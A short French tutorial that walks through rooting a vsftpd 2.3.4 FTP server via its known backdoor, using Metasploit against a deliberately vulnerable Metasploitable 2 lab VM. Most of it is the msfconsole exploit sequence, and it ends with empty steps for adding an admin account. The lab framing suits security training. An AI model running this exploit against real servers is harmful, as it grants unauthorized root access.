Comment obtenir les droits root sur un serveur FTP linux VsFTP 2.3.4 ?
Cette version contient une faille de sécurité qui permet d'ouvrir une backdoor. Pour cette démonstration j'ai utilisé la distribution Metaspoitable 2 qui est une distribution ubuntu bourrée intentionnellement de failles de sécurité pour des raisons éducatives.
Donc pour commencer on lance sa VM (sous VirtualBox dans mon cas, adresse IP 192.168.2.238)
On commence par un petit nmap pour s'assurer que la version est bien présente sur le système.
La version installée est bien vsftpd 2.3.4.
Maintentant on ouvre msfconsole et on cherche les failles vsftp.
msfconsole
msf > search vsftp
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.2.238
NB : 192.168.2.238 = IP du serveur cible
msf exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > exploit
Maintenant tapez les commandes, vous êtes root ;-)
Ajoutez un compte :
Avec des droits Administrateur :
Connectez-vous :
